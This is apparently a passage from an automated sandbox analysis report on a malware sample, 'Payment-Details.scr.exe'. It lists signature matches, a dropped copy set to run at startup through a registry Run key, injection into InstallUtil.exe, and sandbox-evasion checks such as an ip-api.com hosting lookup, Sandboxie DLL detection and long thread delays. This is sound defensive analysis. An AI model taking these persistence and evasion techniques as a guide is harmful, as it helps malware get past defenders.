                    Source: Yara match File source: Process Memory Space: Payment-Details.scr.exe PID: 432, type: MEMORYSTR
                    Source: Yara match File source: Process Memory Space: Fdimzk.exe PID: 6012, type: MEMORYSTR
                    Source: Yara match File source: Process Memory Space: Fdimzk.exe PID: 3228, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exe Code function: 0_2_019F186C pushfd ; retf 0_2_019F186D
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exe Code function: 0_2_0636C6BE push ds; ret 0_2_0636C6E1
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exe Code function: 0_2_0636C6A6 pushfd ; ret 0_2_0636C6BD
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exe Code function: 0_2_063607A1 push es; ret 0_2_063607CC
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exe Code function: 0_2_0636B045 push ebp; retf 0_2_0636B053
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exe Code function: 0_2_06367A1E push es; retf 0_2_06367AB0
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exe Code function: 0_2_06367A7E push es; retf 0_2_06367AB0
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exe Code function: 0_2_070ED410 push FFFFFF8Bh; iretd 0_2_070ED417
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exe Code function: 0_2_070ED29A push FFFFFF8Bh; ret 0_2_070ED29E
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exe Code function: 0_2_070ED2D4 push FFFFFF8Bh; ret 0_2_070ED2D8
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exe Code function: 0_2_070ED2E8 push FFFFFF8Bh; iretd 0_2_070ED2EF
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exe Code function: 0_2_0723A3E2 push eax; iretd 0_2_0723A3ED
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exe Code function: 0_2_07232E6E pushad ; iretd 0_2_07232E71
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exe Code function: 0_2_07230006 pushad ; retf 0_2_0723003D
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exe Code function: 0_2_0723B8D3 push cs; ret 0_2_0723B8DF
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exe Code function: 0_2_0725BA01 pushad ; iretd 0_2_0725BA0D
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exe Code function: 0_2_072C051E push ds; ret 0_2_072C051F
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exe Code function: 0_2_072C36CD push cs; retf 0_2_072C36CE
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exe Code function: 0_2_072C3ED0 push es; ret 0_2_072C3ED6
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe Code function: 4_2_00A0186C pushfd ; retf 4_2_00A0186D
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe Code function: 4_2_0584C6BC pushfd ; ret 4_2_0584C6BD
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe Code function: 4_2_0673ECB9 push 04418B06h; ret 4_2_0673ECB3
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe Code function: 4_2_0673ECA1 push 04418B06h; ret 4_2_0673ECB3
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe Code function: 4_2_0673731B push es; retf 4_2_0673731C
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe Code function: 4_2_068842E8 push 04418B06h; ret 4_2_068844C3
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe Code function: 4_2_06882E6E pushad ; iretd 4_2_06882E71
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe Code function: 4_2_0688B8C9 push cs; ret 4_2_0688B8DF
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe Code function: 4_2_06880007 pushad ; retf 4_2_0688003D
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe Code function: 4_2_06884152 push 04418B06h; ret 4_2_06884183
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe Code function: 4_2_068A5E82 push es; iretd 4_2_068A5E94
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe Code function: 4_2_068AB6D0 push es; ret 4_2_068AB780
                    Source: 0.2.Payment-Details.scr.exe.6f40000.10.raw.unpack, tv46RrRIboVEkiIeNjQ.cs High entropy of concatenated method names: 'RtlInitUnicodeString', 'LdrLoadDll', 'RtlZeroMemory', 'NtQueryInformationProcess', 'zGHRFUoYrH', 'NtProtectVirtualMemory', 'vFE4DXq0jmhXPhUMAXP', 'dAKnQYqP0gy2aQHKXQB', 'AsGBrIqxH3aOG5u0H4q', 'dtje9qqsx6iX6viWAnp'
                    Source: 0.2.Payment-Details.scr.exe.4621310.4.raw.unpack, AssemblyLoader.cs High entropy of concatenated method names: 'CultureToString', 'ReadExistingAssembly', 'CopyTo', 'LoadStream', 'LoadStream', 'ReadStream', 'ReadFromEmbeddedResources', 'ResolveAssembly', 'Attach', 'VZJMVIZ4UVht05XBN1w'
                    Source: 0.2.Payment-Details.scr.exe.4621310.4.raw.unpack, tv46RrRIboVEkiIeNjQ.cs High entropy of concatenated method names: 'RtlInitUnicodeString', 'LdrLoadDll', 'RtlZeroMemory', 'NtQueryInformationProcess', 'zGHRFUoYrH', 'NtProtectVirtualMemory', 'vFE4DXq0jmhXPhUMAXP', 'dAKnQYqP0gy2aQHKXQB', 'AsGBrIqxH3aOG5u0H4q', 'dtje9qqsx6iX6viWAnp'
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exe File created: C:\Users\user\AppData\Roaming\Fdimzk.exe
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Fdimzk

                    Hooking and other Techniques for Hiding and Protection

                    Source: initial sample Icon embedded in binary file: icon matches a legit application icon: download (59).png
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: Yara match File source: Process Memory Space: Payment-Details.scr.exe PID: 432, type: MEMORYSTR
                    Source: Yara match File source: Process Memory Space: Fdimzk.exe PID: 6012, type: MEMORYSTR
                    Source: Yara match File source: Process Memory Space: Fdimzk.exe PID: 3228, type: MEMORYSTR
                    Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: Payment-Details.scr.exe, 00000000.00000002.1676003919.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, Payment-Details.scr.exe, 00000000.00000002.1676003919.00000000037C9000.00000004.00000800.00020000.00000000.sdmp, Payment-Details.scr.exe, 00000000.00000002.1685635994.00000000044FE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2016324901.0000000002381000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2012136822.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Fdimzk.exe, 00000004.00000002.2041551021.0000000003819000.00000004.00000800.00020000.00000000.sdmp, Fdimzk.exe, 00000004.00000002.2013699239.000000000273C000.00000004.00000800.00020000.00000000.sdmp, Fdimzk.exe, 00000004.00000002.2013699239.0000000002B02000.00000004.00000800.00020000.00000000.sdmp, Fdimzk.exe, 00000005.00000002.2100971081.0000000003269000.00000004.00000800.00020000.00000000.sdmp, Fdimzk.exe, 00000005.00000002.2100971081.0000000002F0D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exe Memory allocated: 1910000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exe Memory allocated: 33B0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exe Memory allocated: 1910000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 2190000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 2350000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 4350000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe Memory allocated: A00000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe Memory allocated: 26F0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe Memory allocated: C50000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe Memory allocated: 11B0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe Memory allocated: 2EB0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe Memory allocated: 1320000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 11C0000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 2D80000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 4D80000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 1230000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 2C90000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 4C90000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 1799907
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 1799782
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exe Window / User API: threadDelayed 2433
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exe Window / User API: threadDelayed 7381
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Window / User API: threadDelayed 2388
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Window / User API: threadDelayed 7452
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe Window / User API: threadDelayed 3058
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe Window / User API: threadDelayed 6780
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe Window / User API: threadDelayed 4288
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe Window / User API: threadDelayed 5484
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Window / User API: threadDelayed 2895
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Window / User API: threadDelayed 6937
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Window / User API: threadDelayed 2089
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Window / User API: threadDelayed 7769
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 3272Thread sleep time: -95828s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 3272Thread sleep time: -95718s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 3272Thread sleep time: -95609s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 3272Thread sleep time: -95500s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 3272Thread sleep time: -95390s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 3272Thread sleep time: -95281s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 3272Thread sleep time: -95172s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 3272Thread sleep time: -95061s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 3272Thread sleep time: -94952s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 3272Thread sleep time: -94809s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 3272Thread sleep time: -94549s >= -30000sJump to behavior
